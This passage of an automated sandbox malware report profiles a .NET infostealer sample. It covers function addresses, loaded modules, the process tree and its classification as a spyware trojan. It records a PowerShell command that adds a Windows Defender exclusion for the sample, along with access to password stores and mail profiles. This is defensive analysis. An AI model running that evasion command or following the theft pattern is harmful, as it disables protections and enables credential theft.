                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A52A08_2_047A52A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0478D34C8_2_0478D34C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485132D8_2_0485132D
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E739A8_2_047E739A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FCF28_2_0485FCF2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04819C328_2_04819C32
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A3D408_2_047A3D40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BFDC08_2_047BFDC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04851D5A8_2_04851D5A
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04857D738_2_04857D73
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A9EB08_2_047A9EB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FFB18_2_0485FFB1
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FF098_2_0485FF09
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04763FD58_2_04763FD5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04763FD28_2_04763FD2
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A1F928_2_047A1F92
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0480D8008_2_0480D800
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A38E08_2_047A38E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A99508_2_047A9950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BB9508_2_047BB950
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048359108_2_04835910
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04841AA38_2_04841AA3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483DAAC8_2_0483DAAC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0484DAC68_2_0484DAC6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04857A468_2_04857A46
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FA498_2_0485FA49
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E5AA08_2_047E5AA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04813A6C8_2_04813A6C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04815BF08_2_04815BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047DDBF98_2_047DDBF9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485FB768_2_0485FB76
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BFB808_2_047BFB80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028120808_2_02812080
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280CF608_2_0280CF60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B2A48_2_0280B2A4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B2B08_2_0280B2B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280D1808_2_0280D180
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0280B1608_2_0280B160
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028157308_2_02815730
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028139308_2_02813930
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0282BE108_2_0282BE10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E6DC8_2_0466E6DC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E2C88_2_0466E2C8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466E3E48_2_0466E3E4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466D8488_2_0466D848
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466D8138_2_0466D813
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0466CAE88_2_0466CAE8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0481F290 appears 105 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 047E7E54 appears 111 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0478B970 appears 280 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 047D5130 appears 58 times
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: String function: 0480EA12 appears 86 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0587B970 appears 280 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058D7E54 appears 102 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058C5130 appears 58 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0590F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 058FEA12 appears 86 times
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2055685556.00000000010EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2071119201.0000000007270000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemscorlib.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $cq,\\StringFileInfo\\040904B0\\OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $cq,\\StringFileInfo\\000004B0\\OriginalFilename vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Core.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSystem.Xml.dllT vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000000.2006793536.0000000000922000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs W3MzrFzSF0.exe
                      Source: W3MzrFzSF0.exe Binary or memory string: OriginalFilenameBCYJ.exe> vs W3MzrFzSF0.exe
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, PPUKR5wZS9CW8kiXFb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, PPUKR5wZS9CW8kiXFb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.SetAccessControl
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.7270000.4.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.AddAccessRule
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.SetAccessControl
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.W3MzrFzSF0.exe.3dfe968.2.raw.unpack, z2xNW56F1ZH2jZTKon.cs Security API names: _0020.AddAccessRule
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@16/13
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\W3MzrFzSF0.exe.log
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgmfjlij.vsl.ps1
                      Source: W3MzrFzSF0.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000296B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2367362656.000000000296B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4466952395.000000000299C000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2369580085.0000000002977000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2367275248.0000000002948000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: W3MzrFzSF0.exe ReversingLabs: Detection: 42%
                      Source: W3MzrFzSF0.exe Virustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe File read: C:\Users\user\Desktop\W3MzrFzSF0.exe
                      Source: unknown Process created: C:\Users\user\Desktop\W3MzrFzSF0.exe "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                      Source: C:\Windows\SysWOW64\pcaui.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: version.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: pcaui.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: dui70.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: wer.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: ieframe.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: mlang.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: winsqlite3.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: vaultcli.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Section loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: wininet.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: mswsock.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe, Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder, Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\SysWOW64\pcaui.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: W3MzrFzSF0.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pDqSqZXvqQcT.exe, 00000007.00000002.4467379967.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467350657.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: W3MzrFzSF0.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
